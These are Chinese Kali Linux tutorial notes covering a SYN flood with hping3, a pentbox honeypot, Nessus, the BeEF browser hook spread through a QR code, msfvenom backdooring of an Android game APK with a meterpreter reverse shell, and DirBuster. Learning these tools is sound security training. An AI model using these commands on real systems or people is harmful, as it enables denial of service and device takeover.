1、拒絕服務攻擊
使用某些手段故意佔用某一系統對外服務的有限資源,從而導致其無法正常工作的行爲就是拒絕服務攻擊。實際上拒絕服務攻擊並不是一個攻擊方式,它是一類具有相似特徵的攻擊方式的集合。拒絕服務攻擊有以下分類:
1. 數據鏈路層的拒絕服務攻擊
攻擊目標:交換機
集線器:以前的內網都是用集線器,集線器不具備“學習”和“記憶”功能,多臺機器在通信的時候,都是將信息發給所有的機器,如果不是對應的機器接收到,就不做應答。它的缺點是,我們可以很簡單的獲取到整個網絡內的所有信息。
交換機:交換機有學習和記憶的功能,在交換機內部有一個CAM的表,這個表可以記錄交換機每個接口對應的計算機的MAC地址信息,有了這些信息,在傳輸數據的時候就可以一對一傳輸。
拒絕服務攻擊利用方法:CAM表容量有限,如果我們在短時間內製造大量的不同源的MAC地址發來的數據包,CAM表就會被佔滿,導致交換機無法正常工作。
2.網絡層的拒絕服務攻擊
TCP和UDP就位於這一層,而基於TCP的拒絕服務攻擊,就是大家常說的拒絕服務攻擊。大部分的服務器都是提供HTTP服務的服務器,HTTP協議就是TCP提供的支持。基於TCP的拒絕服務攻擊有兩種:
- 和目標端口完成三次握手,建立一個完整鏈接
- 只和目標端口完成三次握手的前兩次,建立一個不完整的鏈接,這種方式最常用。
利用工具:hping3。實驗靶機:Metasploitable2。
命令:hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source [目標ip]
3.傳輸層的拒絕服務攻擊
4.基於應用層的拒絕服務攻擊
5.DDOS攻擊
大家常說的DDOS攻擊,翻譯過來就是分佈式拒絕服務攻擊,也就是很多的機器同時對目標發起拒絕服務攻擊,這就是爲什麼DDOS往往和肉雞這個詞一起出現的原因。
2、用Kali Linux 蜜罐引誘可能的攻擊者進入陷阱
什麼是蜜罐?許多安全專家都喜歡的一個東西就是蜜罐。簡單地說,蜜罐是模擬特定網絡攻擊目標的系統。有了蜜罐,管理員可以檢測並記錄對某些服務發起的網絡攻擊,以及發起攻擊的IP地址。建立一個蜜罐是相當簡單的,使用Kali Linux和pentbox組合,可以在幾分鐘內啓動和運行一個蜜罐。
可以使用以下命令下載蜜罐:
wget http://downloads.sourceforge.net/project/pentbox18realised/pentbox-1.8.tar.gz
運行pentbox Ruby腳本:
./pentbox.rb
然後會看到一個菜單,在菜單中選擇2(用於網絡工具),然後選擇3(用於蜜罐)。
然後會讓你選擇快捷設置還是手動設置,如果快捷設置報錯了,那麼可以使用手動設置,比如端口被佔用等。
然後可以用另外一臺電腦來訪問該kali的ip地址,別忘了加端口號。
然後就沒有然後了。
3、Nessus
Nessus是目前全世界最多人使用的系統漏洞掃描和分析工具。
1、安裝
- 下載地址:https://www.tenable.com/downloads/nessus?loginAttempted=true。
- 下載kali linux的版本。注意要在kali的系統裏的瀏覽器裏下載哦。
- 然後,在你下載的那個文件夾裏右鍵打開終端:
- 然後輸入:sudo dpkg -i [安裝包名]。
- 開啓服務,命令已經告訴你了。sudo /bin/systemctl start nessusd.service
- 打開瀏覽器,訪問上圖中的鏈接地址。然後會出現個提示,就跟Windows訪問不安全的地址一樣,點灰色的按鈕,接受就好了。
- 點擊下一步,輸入郵箱和姓名(隨便寫好伐)。
- 然後回車,然後會發給你一封信,信裏有Activation Code,輸入Activation Code
- 然後會輸入用戶名和密碼。
- 然後就會更新軟件,就完事了,當然也可能會失敗。
2、使用方法
暫不介紹,自行百度。
4、Apache服務的使用方法
Apache是世界使用排名第一的web服務器軟件。它可以運行在幾乎所有廣泛使用的計算機平臺上,由於其跨平臺和安全性被廣泛使用,是最流行的Web服務器端軟件之一。
運行一個網站,可以作爲文件上傳下載的中轉站。其實咱們之前都玩過了。
啓動apache服務:sudo service apache2 start。
5、掃碼控制
實踐步驟:
- 修改虛擬機的聯網模式爲橋接模式
- 啓動beef框架,打開後設置一個你記得住的密碼。
- 複製網站模板(隨便百度靜態網站模板,就是靜態的html頁面)到kali中,把hook.js文件加入到模板的首頁中。
把這段js腳本代碼,放到如下圖所示即可,注意,看到下面紅框裏的<IP>沒有?改成你的主機IP,就完事了。
- 把網站模板複製到Apache目錄下:
- 先把apache目錄中原有的文件都刪除掉:sudo rm -rf *。
- 然後把剛纔的index.html模板複製到該目錄下,之前學過這命令,不說了
- 啓動apache服務。也說過,再不知道回去看。
- 將網站首頁的鏈接製作成二維碼。通過草料二維碼,把鏈接地址轉換成二維碼就可以了。
- 登錄beef頁面,地址在這裏:
默認的用戶名就是beef,密碼就是剛纔你設置的:
就進來了。
- 用手機掃描二維碼。
- 然後你就可以在瀏覽器的beef標籤裏查看了。
所以!不要輕易掃碼!!!
6、在軟件中植入Payload
1.首先我下載了一個遊戲,你自己隨便下載。
2.在app中植入payload。啥意思不說了哈,都知道了。
sudo msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.199.124 lport=6666 -x /home/zakingwong/game_old.apk R>/home/zakingwong/new.apk
3.然後開啓主控端,進入meterpreter。
4.通過apache把apl發送到你的安卓手機上。
5.安裝並打開遊戲。
6.然後,做之前學過的事吧!
7、DirBuster目錄爆破
要相對一個目標站點做滲透測試,首先要搞清楚的就是目標的目錄結構。這個任務可以交給DirBuster來做。DirBuster是一個多線程Java應用程序,可以破解Web應用程序服務器上的目錄和文件名。DirBuster自帶字典文件,當然我們可以根據收集到的其他信息,針對性的生成更加好用的字典文件。
使用方法,要想使用DirBuster只需要簡單的四部操作,實驗靶機是owasp linux服務器:
- 設置目標網站網址(在kali中搜索DirBuster就能找到了):
- 設置軟件掃碼的速度,也就是線程數。默認爲10,我們可以根據自己的需求設置,如果目標站點帶寬不夠且線程數太高,會導致目標站點無法正常訪問。拖拽修改即可。
- 設置字典文件。字典可以使我們根據已收集到的信息對應生成的字典。也可以是dirbuster默認自帶的幾個字典。dirbuster自帶的字典文件在/usr/share/dirbuster/wordlists/目錄下。
- 這些不用動,點start就可以了。
- 然後,我們可以在下圖的tabs中查看各種掃描結果信息